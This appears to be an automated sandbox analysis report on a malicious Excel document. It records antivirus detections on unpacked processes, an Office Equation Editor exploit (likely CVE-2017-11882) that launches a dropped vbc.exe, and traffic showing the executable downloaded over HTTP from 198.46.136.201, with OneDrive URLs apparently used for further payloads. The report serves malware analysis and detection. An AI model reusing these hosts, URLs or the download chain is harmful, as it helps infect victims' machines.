Source: 11.3.Esfjmbxd.exe.1d84f28.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91604.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9058c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85e30.138.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28fdc.175.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d1ac.248.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d34008.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d852c8.112.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d410fc.238.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e89258.186.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d098.243.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e993d4.175.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d444.264.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d598.276.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e80c38.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d850cc.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91604.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d20b08.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84f28.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d620.283.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88e6c.161.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e85388.121.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d4f0.271.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e89308.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e98008.154.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2ce70.235.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1ef4.277.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41dfc.274.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88b08.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e99a1c.195.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d990f4.168.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e848e0.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28b08.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d5a0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91d44.130.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31b2c.122.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1dfc.273.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9f438.209.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91b2c.124.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8c008.208.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d35be4.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d594.280.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8f438.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2cb84.228.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d99a1c.195.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41dac.270.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1324.241.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e919ac.113.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e99a74.201.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1dac.269.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8c3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d250cc.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d4f0.272.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d89258.186.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1b18.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d620.283.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e89258.185.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e843b0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d80b08.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d5a0.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d7e84c.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8bffc.148.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d93ffc.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2914c.179.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d4f0.273.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8c8e0.219.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41774.249.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d88e6c.161.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e89f80.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d1ac.247.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d89258.185.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8fffc.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d444.263.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88e6c.167.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88fdc.174.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d29f80.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e848e4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.logagent.exe.72480000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.3.vbc.exe.1e98fb8.157.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e90ed4.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d88e6c.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8fffc.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d80eec.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25494.130.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e98008.152.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8911c.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d3d60c.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d3d0a8.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d40ad4.226.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d4f4.267.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2cb84.227.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea058c.218.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d4f0.272.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39938.187.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8932c.191.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41ef4.278.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25e2c.140.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e94008.145.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d84370.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d5a0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39a1c.195.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28e6c.163.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e996b4.180.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28e6c.167.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9909c.162.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2cf84.239.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8c8e4.216.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d393d4.174.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1324.241.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88e6c.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24370.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41324.241.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41520.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8943c.205.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e850cc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d594.279.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9db70.110.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85e2c.142.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d248e4.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e93000.141.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d34008.147.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2764.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91b2c.124.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.logagent.exe.72480000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.3.vbc.exe.1e990f4.168.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2ce70.236.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91b2c.122.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8459c.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8cf84.240.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.72480000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.Esfjmbxd.exe.1d8ce70.236.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d1ac.247.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41ca4.266.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ad4.83.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8ce70.235.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d4058c.218.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1520.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41774.250.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e94008.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2764.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d1e84c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9d0a8.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da154c.244.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d89308.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e90008.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1324.242.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8932c.199.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d29f80.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c3b0.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85eec.144.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ad4.81.unpack Avira: Label: TR/Patched.Ren.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: logagent.exe, logagent.exe, 00000006.00000002.615134919.0000000002060000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.526241583.0000000001ED0000.00000004.00000001.sdmp, logagent.exe, 00000006.00000002.617474362.00000000021E0000.00000040.00000001.sdmp, logagent.exe, 00000006.00000003.525081229.00000000006B0000.00000004.00000001.sdmp
Source: Binary string: cmstp.pdb source: logagent.exe, 00000006.00000002.613866471.0000000000844000.00000004.00000020.sdmp, logagent.exe, 00000006.00000002.613071462.00000000001C0000.00000040.00020000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F7DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_042F7DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F56C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_042F56C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A27DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 8_2_03A27DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A256C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_03A256C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C17DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 11_2_03C17DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C156C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_03C156C4

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.136.201:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 4x nop then pop edi 6_2_7248C3F1
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.46.136.201:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 17:59:04 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26Last-Modified: Thu, 02 Dec 2021 04:16:21 GMTETag: "aa600-5d2220d845288"Accept-Ranges: bytesContent-Length: 697856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.136.201Connection: Keep-Alive
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: EXCEL.EXE, 00000000.00000003.462635488.0000000005682000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.686338748.00000000056A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488474332.000000000569D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458387765.000000000567F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.475950453.000000000569D000.00000004.00000001.sdmp String found in binary or memory: http://purl.or
Source: vbc.exe, 00000004.00000002.526299190.00000000043A0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.545744651.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.526299190.00000000043A0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.587231139.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EXCEL.EXE, 00000000.00000002.685373702.0000000004FD7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mwiQWh6cfss-mW5wezTm5o7oGjOP62NBGfPYedvCz2WKwFZgTNzbddi7h4QH2It-m
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mwsG06syifTHAS5HkN28pWDk3GlzC5z84oxMa9e3TcbYAr9A_gIaA9INSaV2yKob0
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://kq7x1q.am.files.1drv.com/y4mxhWp3h-UsRCUD9vA7Dev8BiVWxcpKH13bzTDe7jB8OzNuMsD0PxjLns2tLasVuJa
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://onedrive.live.com/
Source: vbc.exe, 00000004.00000002.525876843.00000000033E0000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=B2E8AC4B094502D7&resid=B2E8AC4B094502D7%21113&authkey=APgSc0s
Source: vbc.exe, 00000004.00000002.525492309.00000000005F6000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
